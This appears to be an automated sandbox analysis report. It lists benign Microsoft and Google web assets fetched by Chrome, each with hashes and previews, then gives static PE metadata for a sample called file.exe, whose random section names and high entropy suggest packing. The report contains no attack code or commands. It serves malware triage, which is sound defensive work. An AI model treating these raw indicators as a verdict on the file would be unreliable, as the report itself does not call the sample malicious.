                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):464328
                                                                                                                                                                                          Entropy (8bit):5.074669864961383
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                          MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                          SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                          SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                          SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                          Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                          Entropy (8bit):3.875
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:HMB:k
                                                                                                                                                                                          MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                          SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                          SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                          SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                          Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):25441
                                                                                                                                                                                          Entropy (8bit):5.152769469811509
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                          MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                          SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                          SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                          SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):195712
                                                                                                                                                                                          Entropy (8bit):5.430058240656712
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVlis:Wof3G0NSkNzMeO7z/l3ll
                                                                                                                                                                                          MD5:A307DE6214648B16414DC641D7399066
                                                                                                                                                                                          SHA1:63980CBC7F3DF8838611519460B570EA50BF5751
                                                                                                                                                                                          SHA-256:99B65058137EDB2B63400C273F6F5A064E3B0244152B916FD8C3C7C3818D9D93
                                                                                                                                                                                          SHA-512:EE879CC90BF7EF0BE89670D0F0D7F6A85A37324D0C892694D78AE81A28692BE6045A0B59588549533D9AC8E6FC91978778999E37942B530E979D403D95E2D0CD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                          Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):25441
                                                                                                                                                                                          Entropy (8bit):5.152769469811509
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                          MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                          SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                          SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                          SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                          Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):15427
                                                                                                                                                                                          Entropy (8bit):7.784472070227724
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                          MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                          SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                          SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                          SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):1432
                                                                                                                                                                                          Entropy (8bit):4.986131881931089
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                          MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                          SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                          SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                          SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                          Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):1173007
                                                                                                                                                                                          Entropy (8bit):5.503893944397598
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                          MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                          SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                          SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                          SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                          Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):13339
                                                                                                                                                                                          Entropy (8bit):7.683569563478597
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                          MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                          SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                          SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                          SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Entropy (8bit):7.948990199179652
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:file.exe
                                                                                                                                                                                          File size:1'857'536 bytes
                                                                                                                                                                                          MD5:f119a5326d7ef739b4b499912b709bc8
                                                                                                                                                                                          SHA1:9baa232461198249f1ff54f401af2eed8973aec0
                                                                                                                                                                                          SHA256:61bad5edc639bce6554b8f1d5a1ac6b00e93797f27f18f897c98ee21b72c790c
                                                                                                                                                                                          SHA512:44711da74817c73ffac6f3dbb6be8c1cbf807ad2ea8bb403e152198630bd503a2f1ae644dd96a75d95898d142a486a05ac260ede01a2484c57beee344aa93f04
                                                                                                                                                                                          SSDEEP:49152:WHQYeDtCCGShbk+cqcpoQuAl/M5Pu5TdNy8N0S:W9WCx8bkpqcpolAu9mTdNy8S
                                                                                                                                                                                          TLSH:EA8533C16C920969DEC699B6196E5D5A6A3211BCDC6283EEF00BC03E44F7BDFCB4244D
                                                                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@...........................I.....(.....@.................................\...p..
                                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                                          Entrypoint:0x89c000
                                                                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                          Instruction
                                                                                                                                                                                          jmp 00007FBF3C834B1Ah
                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                          0x10000x560000x262004cb803ef0a17e3f845b47ead6bee4799False0.9992891905737705data7.9805713763738915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          .rsrc0x570000x2b00x200acab31fd9199eb7a3fa626ce57655568False0.794921875data6.043271706503178IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          0x590000x2a60000x200d7ba45e93e13ff62b9db27988f3969abunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          okzfovcg0x2ff0000x19c0000x19b80027abafab649f2d522c6c3207d9116601False0.993935938449271data7.95393650915222IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          ujgghjao0x49b0000x10000x60037a10fbe653d430cf85eafcc9a4f362bFalse0.5891927083333334data5.092468387493666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
